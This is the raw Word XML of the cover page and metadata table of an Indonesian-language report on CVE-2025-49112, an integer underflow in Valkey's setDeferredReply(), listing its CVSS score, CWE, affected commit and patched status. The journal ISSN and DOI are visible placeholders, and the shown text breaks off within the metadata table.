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7486137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A1628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5CD57B56" wp14:textId="77777777">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pP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JURNAL RISET KEAMANAN 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SIBER  |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 VULNERABILITY RESEARCH REPORT</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="0A37501D" wp14:textId="77777777">
      <w:pPr>
        <w:spacing w:before="0" w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="2A941EAF" wp14:textId="77777777">
      <w:pPr>
        <w:spacing w:after="60"/>
        <w:jc w:val="center"/>
      </w:pP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>ISSN (Online): 2025-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>ZZXX  |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 xml:space="preserve">  DOI: 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>10.XXXXX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>/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>jrks.v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>1i3.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>003  |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 xml:space="preserve">  Vol. 1 No. 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>3  |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 xml:space="preserve">  April 2025</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="5DAB6C7B" wp14:textId="77777777">
      <w:pPr>
        <w:spacing w:before="0" w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="02EB378F" wp14:textId="77777777">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="0A1628" w:sz="10" w:space="1"/>
        </w:pBdr>
        <w:spacing w:before="140" w:after="140"/>
      </w:pPr>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="6A05A809" wp14:textId="77777777">
      <w:pPr>
        <w:spacing w:before="0" w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="40A1D1B2" wp14:textId="77777777">
      <w:pPr>
        <w:spacing w:after="80" w:line="310" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="4EEA54D5" w:rsidR="4EEA54D5">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="0A1628"/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Analisis</w:t>
      </w:r>
      <w:r w:rsidRPr="4EEA54D5" w:rsidR="4EEA54D5">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="0A1628"/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Teknis CVE-2025-49112:</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="5EBE33D2" wp14:textId="77777777">
      <w:pPr>
        <w:spacing w:after="80" w:line="305" w:lineRule="auto"/>
        <w:jc w:val="center"/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6"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Integer Underflow pada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6"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Fungsi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6"/>
          <w:szCs w:val="36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6"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>setDeferredReply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6"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="4EEA54D5" w14:paraId="0AE08C1A" wp14:textId="77777777">
      <w:pPr>
        <w:spacing w:after="100" w:line="300" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="1A3A5C"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36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6"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>dalam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6"/>
          <w:szCs w:val="36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6"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Subsistem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6"/>
          <w:szCs w:val="36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6"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Jaringan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6"/>
          <w:szCs w:val="36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6"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Valkey</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="3F28429F" wp14:textId="77777777">
      <w:pPr>
        <w:spacing w:after="80" w:line="290" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="4EEA54D5" w:rsidR="4EEA54D5">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:color w:val="5A6070"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Studi Kasus </w:t>
      </w:r>
      <w:r w:rsidRPr="4EEA54D5" w:rsidR="4EEA54D5">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:color w:val="5A6070"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Eksploitasi</w:t>
      </w:r>
      <w:r w:rsidRPr="4EEA54D5" w:rsidR="4EEA54D5">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:color w:val="5A6070"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Unsigned Integer Underflow, </w:t>
      </w:r>
      <w:r w:rsidRPr="4EEA54D5" w:rsidR="4EEA54D5">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:color w:val="5A6070"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Analisis</w:t>
      </w:r>
      <w:r w:rsidRPr="4EEA54D5" w:rsidR="4EEA54D5">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:color w:val="5A6070"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26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color w:val="5A6070"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Ghidra</w:t>
      </w:r>
      <w:r w:rsidRPr="4EEA54D5" w:rsidR="4EEA54D5">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:color w:val="5A6070"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="5904B3AB" wp14:textId="77777777">
      <w:pPr>
        <w:spacing w:after="200" w:line="290" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="4EEA54D5" w:rsidR="4EEA54D5">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:color w:val="5A6070"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">dan Strategi </w:t>
      </w:r>
      <w:r w:rsidRPr="4EEA54D5" w:rsidR="4EEA54D5">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:color w:val="5A6070"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Mitigasi</w:t>
      </w:r>
      <w:r w:rsidRPr="4EEA54D5" w:rsidR="4EEA54D5">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:color w:val="5A6070"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> pada </w:t>
      </w:r>
      <w:r w:rsidRPr="4EEA54D5" w:rsidR="4EEA54D5">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:color w:val="5A6070"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Sistem</w:t>
      </w:r>
      <w:r w:rsidRPr="4EEA54D5" w:rsidR="4EEA54D5">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:color w:val="5A6070"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26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color w:val="5A6070"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Terdistribusi</w:t>
      </w:r>
      <w:r w:rsidRPr="4EEA54D5" w:rsidR="4EEA54D5">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:color w:val="5A6070"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26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color w:val="5A6070"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Berbasis</w:t>
      </w:r>
      <w:r w:rsidRPr="4EEA54D5" w:rsidR="4EEA54D5">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:color w:val="5A6070"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> C</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="5A39BBE3" wp14:textId="77777777">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="D0DCF0" w:sz="4" w:space="1"/>
        </w:pBdr>
        <w:spacing w:before="140" w:after="140"/>
      </w:pPr>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="41C8F396" wp14:textId="77777777">
      <w:pPr>
        <w:spacing w:before="0" w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="011D7AE7" wp14:textId="77777777">
      <w:pPr>
        <w:spacing w:after="80"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="4EEA54D5" w:rsidR="4EEA54D5">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:color w:val="5A6070"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Penulis</w:t>
      </w:r>
      <w:r w:rsidRPr="4EEA54D5" w:rsidR="4EEA54D5">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:color w:val="5A6070"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> dan </w:t>
      </w:r>
      <w:r w:rsidRPr="4EEA54D5" w:rsidR="4EEA54D5">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:color w:val="5A6070"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Peneliti</w:t>
      </w:r>
      <w:r w:rsidRPr="4EEA54D5" w:rsidR="4EEA54D5">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:color w:val="5A6070"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="0D987CC6" wp14:textId="77777777">
      <w:pPr>
        <w:spacing w:after="80"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1C1C1C"/>
          <w:sz w:val="34"/>
          <w:szCs w:val="34"/>
        </w:rPr>
        <w:t xml:space="preserve">@odaysec</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="02413195" wp14:textId="77777777">
      <w:pPr>
        <w:spacing w:after="80"/>
        <w:jc w:val="center"/>
      </w:pP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22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Independent Security 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22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Researcher  |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22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">  Vulnerability Discovery &amp; Analysis</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="352B86BD" wp14:textId="77777777">
      <w:pPr>
        <w:spacing w:after="80"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A3A5C"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">GitHub: </w:t>
      </w:r>
      <w:hyperlink w:history="1" r:id="rIduaeybj5acooeigh9fwnt-">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:eastAsia="Cambria" w:cs="Cambria"/>
            <w:color w:val="2E75B6"/>
            <w:sz w:val="21"/>
            <w:szCs w:val="21"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">https://github.com/odaysec</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="35718B45" wp14:textId="77777777">
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="4EEA54D5" w:rsidR="4EEA54D5">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:color w:val="5A6070"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">April </w:t>
      </w:r>
      <w:r w:rsidRPr="4EEA54D5" w:rsidR="4EEA54D5">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:color w:val="5A6070"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>2025  |</w:t>
      </w:r>
      <w:r w:rsidRPr="4EEA54D5" w:rsidR="4EEA54D5">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:color w:val="5A6070"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">  Responsible Disclosure Compliant</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="72A3D3EC" wp14:textId="77777777">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="D8DDE6" w:sz="2" w:space="1"/>
        </w:pBdr>
        <w:spacing w:before="140" w:after="140"/>
      </w:pPr>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="0D0B940D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4EEA54D5" w14:paraId="1B0AAF3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C0392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7C4EB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CVSS SCORE</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1ECE016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 xml:space="preserve">7.5</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="402007E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CCCC"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">HIGH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1E028CC" wp14:textId="77777777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1A3A5C"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">CVE ID: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:eastAsia="Cambria" w:cs="Cambria"/>
                <w:color w:val="1C1C1C"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">CVE-2025-49112</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="59459802" wp14:textId="77777777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1A3A5C"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">GHSA: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:eastAsia="Cambria" w:cs="Cambria"/>
                <w:color w:val="1C1C1C"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">GHSA-xhp4-6g9v-4xvj</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="14D726B8" wp14:textId="77777777">
            <w:pPr>
              <w:spacing w:after="80"/>
            </w:pP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3A5C"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">Vector: </w:t>
            </w:r>
            <w:r w:rsidRPr="4EEA54D5" w:rsidR="4EEA54D5">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
                <w:color w:val="1C1C1C"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>AV:N</w:t>
            </w:r>
            <w:r w:rsidRPr="4EEA54D5" w:rsidR="4EEA54D5">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
                <w:color w:val="1C1C1C"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:r w:rsidRPr="4EEA54D5" w:rsidR="4EEA54D5">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
                <w:color w:val="1C1C1C"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>AC:L</w:t>
            </w:r>
            <w:r w:rsidRPr="4EEA54D5" w:rsidR="4EEA54D5">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
                <w:color w:val="1C1C1C"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:r w:rsidRPr="4EEA54D5" w:rsidR="4EEA54D5">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
                <w:color w:val="1C1C1C"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>PR:N</w:t>
            </w:r>
            <w:r w:rsidRPr="4EEA54D5" w:rsidR="4EEA54D5">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
                <w:color w:val="1C1C1C"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:r w:rsidRPr="4EEA54D5" w:rsidR="4EEA54D5">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
                <w:color w:val="1C1C1C"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>UI:N</w:t>
            </w:r>
            <w:r w:rsidRPr="4EEA54D5" w:rsidR="4EEA54D5">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
                <w:color w:val="1C1C1C"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:r w:rsidRPr="4EEA54D5" w:rsidR="4EEA54D5">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
                <w:color w:val="1C1C1C"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>S:U</w:t>
            </w:r>
            <w:r w:rsidRPr="4EEA54D5" w:rsidR="4EEA54D5">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
                <w:color w:val="1C1C1C"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:r w:rsidRPr="4EEA54D5" w:rsidR="4EEA54D5">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
                <w:color w:val="1C1C1C"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>C:N</w:t>
            </w:r>
            <w:r w:rsidRPr="4EEA54D5" w:rsidR="4EEA54D5">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
                <w:color w:val="1C1C1C"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:r w:rsidRPr="4EEA54D5" w:rsidR="4EEA54D5">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
                <w:color w:val="1C1C1C"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>I:N</w:t>
            </w:r>
            <w:r w:rsidRPr="4EEA54D5" w:rsidR="4EEA54D5">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
                <w:color w:val="1C1C1C"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>/A:H</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2509AA38" wp14:textId="77777777">
            <w:pPr>
              <w:spacing w:after="80"/>
            </w:pP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3A5C"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">Jenis 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3A5C"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Kerentanan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3A5C"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">: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CWE-191: Integer Underflow (Wrap-Around)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2CDFAEBF" wp14:textId="77777777">
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pP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3A5C"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Komponen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3A5C"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> Terdampak: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networking.c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-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setDeferredReply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() function</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="0E27B00A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4EEA54D5" w14:paraId="0BE8D847" wp14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="31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A78941" wp14:textId="77777777">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:color w:val="5A6070"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Target Software</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0A3336BB" wp14:textId="77777777">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pP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0A1628"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Valkey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0A1628"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> (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0A1628"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>valkey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0A1628"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>-io/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0A1628"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>valkey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0A1628"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>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92675A" wp14:textId="77777777">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:color w:val="5A6070"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Commit Terdampak</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="57B09B90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0A1628"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">daea05b1e26db29bfd1c033e27f9d519a2f8ccbb</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="31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9FBFDD" wp14:textId="77777777">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:color w:val="5A6070"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Status</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0B271A85" wp14:textId="77777777">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pP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7A3C"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>PATCHED  |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7A3C"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
